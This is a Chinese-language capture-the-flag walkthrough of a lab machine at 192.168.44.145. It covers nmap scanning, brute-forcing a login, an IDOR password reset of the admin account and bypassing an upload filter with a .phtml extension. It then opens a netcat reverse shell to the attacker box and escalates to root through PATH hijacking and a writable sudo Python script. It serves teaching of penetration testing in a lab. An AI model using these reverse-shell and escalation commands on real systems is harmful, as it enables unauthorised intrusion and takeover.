信息收集:
使用nmap对目标进行信息收集 nmap -A 192.168.44.145
发现开放了22和80端口,通过curl 192.168.44.145
得知可直接IP访问,并知道了192.168.44.145/login.php
直接访问:
此处我们也知道了可以进行注册账号。
暴力破解:
通过burp抓到登录包进行暴力破解
爆破出账号密码为:admin/123456
但靶场作者说过这个靶场不需要进行暴力破解。
越权:
上面说到有注册的地方,我们进行注册一个账号 xiaoyao/123456
然后我们去进行登录
我们发现url中php?id=7,我们将他改成前面靠前一点的数字
得到提示说我们不能访问别人的用户信息,修改密码进行抓包看看
我们发现password后面id带有7,现在假设admin为1,我们将7改成数1
这个时候有反馈说我们密码已经更新了
那我们尝试用admin/test123去登录
成功登录。
文件上传漏洞
在我们上传2.php时,提示不允许访问,但估计是做了上传限制
在将后缀改成phtml的时候成功上传
反弹shell
我们kali开启nc
nc -lvvp 8888
蚁剑终端输入:
mknod backdoor p && nc 192.168.44.144 8888 0<backdoor | /bin/bash 1>backdoor
使用python3 来生成一个shell
python3 -c 'import pty as pt;pt.spawn("/bin/bash")'
提权
cat /etc/passwd
我们发现了John用户,并知道了路径/home/john,那我们切换到/home/john路径
```
cd /home/john
并执行 ls -la 查看一下系统中的文件
```
也可以通过 ls -l
我们发现toto文件有执行权限,并看到了敏感的文件user和password
执行toto
./toto
这个文件是id的副本,它以John用户的身份执行,那这样,我们可以创建一个具有相同名称的自定义二进制文件将目录导出到PATH:
echo 'bash' > /tmp/id; chmod +x /tmp/id; export PATH=/tmp:$PATH
此时我们已经可以查看敏感文件得到密码为root123
这密码是John用户的密码,并发现会以root执行file.py,并且我们对其进行更改,那这样可以直接写入shell
```
echo 'import os;os.system("/bin/bash")' > file.py
sudo python3 /home/john/file.py
```
成功获取root权限,我们查看flag
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论